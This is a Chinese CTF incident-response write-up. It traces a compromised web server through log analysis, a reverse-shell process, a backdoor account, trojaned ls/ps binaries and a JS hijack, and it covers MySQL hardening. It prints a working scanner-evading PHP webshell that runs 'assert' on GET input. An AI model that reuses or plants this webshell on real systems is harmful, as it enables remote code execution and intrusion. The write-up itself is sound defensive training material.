BUGKU PAR 应急加固

js劫持

点开之后发现有个URL跳转,跳转到了博客,所以劫持后的URL是

https://www.194nb.com

首次webshell

ssh上去直接看/var/www/html目录,找类似Upload的文件夹

直接找到webshell

image-20221016203611008

首次攻击方式

使用命令

1
cat /var/log/nginx/access.log |cut -d " " -f 1 |sort |uniq -c |sort -nr |head -n 10

获得访问前10的ip地址(nginx)

apache如下

1
2
3
cat access_log|awk '{print $1}'|sort|uniq-c|sort -nr|head -10

注意awk '{print$1',它表示取日志的第一段,如果换成别的日志,其IP地址在第3段那么就要改变相应数值。

image-20221016204107813

IP地址123.139.39.161明显异常,利用工具查看其动作

利用日志分析工具

https://security.tencent.com/index.php/opensource/detail/15

scp上传服务器

image-20221016203755232

image-20221016204801960

可以看到某个ip地址访问的URL,但是从这里没有看出异常,除了1.php。

先手动看一下nginx日志,grep上述地址

image-20221016205048627

image-20221016205115428

image-20221016205141009

可以看到/sale/api这里有一个xss的payload,交一下试试,小写xss正确

黑客服务器信息

看下进程和端口

image-20221016205734324

lsof看到80端口有/dev/null字样,可能有异常,但是不能确定是什么问题

ps aux 看到有运行的脚本文件

image-20221016205836669

一个反弹shell

image-20221016205932244

ip地址49.232.241.253:8888

黑客webshell2

刚才logforensics找到的1.php看一眼

image-20221016210200093

image-20221016210223004

这个文件用D盾和河马是杀不出来的,所以免杀马++

1
<?php $aa=_GET;@array_map(implode('',['a','s','s','e','r','t']),$$aa); ?>

mysql

mysql> revoke file on . from ‘root’@’localhost’;

mysql> set global general_log=’off’;

flush privileges;

mysql更新密码:mysql> set password for root@localhost =password(‘12345678’)

mysql备份数据库

mysqldump -u root -p12345678 –all-databases >1.sql

mysql还原数据库

mysql -u root -p <1.sql

黑客账号

cat /etc/passwd

cat /etc/shadow

发现账号aman并且删除

image-20221016211345910

黑客篡改命令1和2

看一下bin目录的ls

有个ls和ls2,file一下

image-20221016212123565

ls有问题

修复一下

image-20221016212247780

发现ps也有问题

image-20221016212311673

一样地,ps隐藏了某个进程

image-20221016212346361

rm -rf ps

mv ps_ ps

JS劫持修复

1
find . | xargs grep -ri '"text/javascript">' -l | sort | uniq -c

image-20221016213127890

image-20221016213229871

把最后一个script标签删掉就好了